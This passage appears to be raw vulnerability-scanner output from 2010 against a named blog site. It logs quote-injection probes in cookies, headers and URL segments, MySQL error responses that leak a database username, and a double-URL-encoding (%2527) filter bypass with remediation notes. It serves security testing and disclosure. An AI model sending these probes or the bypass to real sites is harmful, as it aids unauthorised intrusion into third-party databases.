Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/seo/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; Referer: http://www.google.com/search?hl=en&q=%00''
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:25:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:25:59 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:25:59 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21849
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/seo/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:14:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/seo/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:15:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/seo/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:12:08 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/seo/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:12:09 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:12:11 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:12:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)' Connection: close Referer: http://www.analyticspros.com/blog/seo.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:30:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'' Connection: close Referer: http://www.analyticspros.com/blog/seo.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:30:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:30:23 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:30:23 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27737
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the optimizelyBuckets cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/seo/59-search-ranking-position-with-ga.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:24:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/seo/59-search-ranking-position-with-ga.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:24:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:24:17 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:24:17 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:26:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:26:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:27:14 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:27:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the optimizelyBuckets cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:28:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:28:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:28:34 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:28:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25534
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:40:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:40:28 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/urchin.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:28:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/urchin.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:28:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
